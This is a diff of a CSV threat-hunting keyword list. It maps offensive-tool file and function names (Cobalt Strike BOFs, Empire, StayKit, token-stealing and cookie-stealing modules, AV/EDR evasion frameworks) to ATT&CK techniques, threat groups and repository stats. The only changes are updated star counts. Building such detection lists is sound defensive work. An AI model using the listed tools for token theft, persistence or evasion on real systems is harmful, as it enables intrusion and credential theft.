"*Start-PSAmsiServer.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" -"*Start-TCPMonitor*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Start-MonitorTCPConnections.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Start-TCPMonitor*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Start-MonitorTCPConnections.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*startupfolderperistence.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*Start-WebServer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*StartWebServiceBeacon*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" @@ -17383,77 +17566,77 @@ "*static_syscalls_apc_spawn*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*static_syscalls_dump*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*statistically-likely-usernames*","offensive_tool_keyword","statistically-likely-usernames","This resource contains wordlists for creating statistically likely usernames for use in username-enumeration. simulated password-attacks and other security testing tasks.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/insidetrust/statistically-likely-usernames","1","1","N/A","N/A","7","699","112","2022-08-31T20:27:53Z","2016-02-14T23:24:39Z" -"*StayKit.cna*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*StayKit.cna*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*StayKit.exe*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*StayKit.git*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.cna*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.cna*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.exe*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.git*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*Steal_Pipe_Token /PipeName*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*steal_token *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*steal_token(*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" -"*steal_token.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" -"*steal_token_access_mask*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" -"*steal-cert.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*steal_token.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*steal_token_access_mask*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*steal-cert.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*StealCookie-28050355-D9DF-4CE7-BFBC-4F7DDE890C2A.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*StealPowerAutomateToken-C4E7B7DA-54E4-49AB-B634-FCCD77C65025.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*Sticky-Keys-Slayer*","offensive_tool_keyword","Sticky-Keys-Slayer","Scans for accessibility tools backdoors via RDP","T1078 - T1015 - T1203","TA0003 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/linuz/Sticky-Keys-Slayer","1","1","N/A","N/A","4","319","80","2018-03-16T15:59:41Z","2016-08-06T18:55:28Z" -"*StickyNotesExtract.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*StickyNotesExtract.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*stinger_client -*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","0","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*stinger_client.py*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 